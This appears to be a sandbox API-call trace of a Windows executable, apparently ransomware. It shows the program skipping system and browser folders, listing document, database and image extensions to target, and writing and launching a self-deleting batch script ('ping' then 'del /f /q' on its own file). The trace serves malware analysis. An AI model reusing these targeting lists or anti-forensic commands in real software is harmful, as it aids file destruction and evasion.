[0115.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 
[0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0115.602] GetCurrentThreadId () returned 0xdec [0115.602] GetCurrentThreadId () returned 0xdec [0115.602] GetCurrentThreadId () returned 0xdec [0115.602] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0115.602] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0115.602] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0115.602] LockResource (hResData=0x516f58) returned 0x516f58 [0115.602] FreeResource (hResData=0x516f58) returned 0 [0115.602] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0115.602] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0115.602] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0115.602] LockResource (hResData=0x50d64c) returned 0x50d64c [0115.602] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x15050b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0115.602] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x15050b0, cbMultiByte=38, lpWideCharStr=0x14fde4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0115.602] FreeResource (hResData=0x50d64c) returned 0 [0115.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, 
cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0115.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x15050b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0115.602] GetCurrentThreadId () returned 0xdec [0115.602] GetCurrentThreadId () returned 0xdec [0115.602] GetCurrentThreadId () returned 0xdec [0115.602] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1494258, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0115.602] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1494258, cbMultiByte=97, lpWideCharStr=0x1462ebc, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0115.603] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0115.603] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0115.603] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0115.603] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0115.603] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0115.603] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0115.603] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0115.603] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0115.603] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0115.603] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0115.603] CharLowerBuffW (in: 
lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0115.603] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.603] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.603] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.603] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.603] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.603] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.603] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.603] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.603] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.603] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, 
lpParameter=0x14e0df0, dwCreationFlags=0x4, lpThreadId=0x14fdd84 | out: lpThreadId=0x14fdd84*=0xe18) returned 0xb8 [0115.640] SetThreadPriority (hThread=0xb8, nPriority=0) returned 1 [0115.640] ResumeThread (hThread=0xb8) returned 0x1 [0115.640] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xea60) returned 0x0 [0115.808] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0x30 [0115.808] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0115.808] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0115.808] SizeofResource (hModule=0x400000, hResInfo=0x51c510) returned 0x53 [0115.808] LockResource (hResData=0x5187d4) returned 0x5187d4 [0115.808] FreeResource (hResData=0x5187d4) returned 0 [0115.808] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0115.808] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0115.808] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0115.808] LockResource (hResData=0x50d64c) returned 0x50d64c [0115.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1505120, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0115.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1505120, cbMultiByte=38, lpWideCharStr=0x14fdf6c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0115.808] FreeResource (hResData=0x50d64c) returned 0 [0115.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0115.808] WideCharToMultiByte (in: 
CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1505124, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0115.808] GetCurrentThreadId () returned 0xdec [0115.808] GetCurrentThreadId () returned 0xdec [0115.808] GetCurrentThreadId () returned 0xdec [0115.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14fde48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0115.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14fde48, cbMultiByte=83, lpWideCharStr=0x149012c, cchWideChar=83 | out: lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0115.808] GetTickCount () returned 0x277cd [0115.808] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=17259758321) returned 1 [0115.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="s畔﮴\x12\x1c翻") returned 1 [0115.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="Q畔﮴\x12\x1c翻") returned 1 [0115.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="F畔﮴\x12\x1c翻") returned 1 [0115.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="g畔﮴\x12\x1c翻") returned 1 [0115.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: 
lpWideCharStr="q畔﮴\x12\x1c翻") returned 1 [0115.809] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="t畔﮴\x12\x1c翻") returned 1 [0115.809] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="R畔﮴\x12\x1c翻") returned 1 [0115.809] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="n畔﮴\x12\x1c翻") returned 1 [0115.809] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0115.809] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0115.809] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe", lpszShortPath=0x149c65c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe") returned 0x30 [0115.809] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0115.809] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0115.809] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\sqfgqtrn.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0115.809] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"\r\ndel /f /q 
\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0115.809] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0115.809] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x147fbd8, cbMultiByte=145, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"\r\n", lpUsedDefaultChar=0x0) returned 145 [0115.809] WriteFile (in: hFile=0xe8, lpBuffer=0x147fbd8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x147fbd8*, lpNumberOfBytesWritten=0x12fb60*=0x91, lpOverlapped=0x0) returned 1 [0115.810] CloseHandle (hObject=0xe8) returned 1 [0115.811] GetCurrentThreadId () returned 0xdec [0115.811] GetCurrentThreadId () returned 0xdec [0115.811] GetCurrentThreadId () returned 0xdec [0115.811] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, 
lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0xec, hThread=0xe8, dwProcessId=0xe2c, dwThreadId=0xe30)) returned 1 [0115.817] CloseHandle (hObject=0xec) returned 1 [0115.817] CloseHandle (hObject=0xe8) returned 1 [0115.817] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () 
returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] WSACleanup () returned 0 [0116.191] FreeLibrary (hLibModule=0x77380000) returned 1 [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentProcess () returned 0xffffffff [0116.192] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0116.192] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] ResetEvent (hEvent=0x88) returned 1 [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] ResetEvent (hEvent=0x88) returned 1 [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] CloseHandle (hObject=0x88) returned 1 [0116.192] CloseHandle (hObject=0x8c) returned 1 [0116.192] CloseHandle (hObject=0x84) 
returned 1 [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: 
lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, 
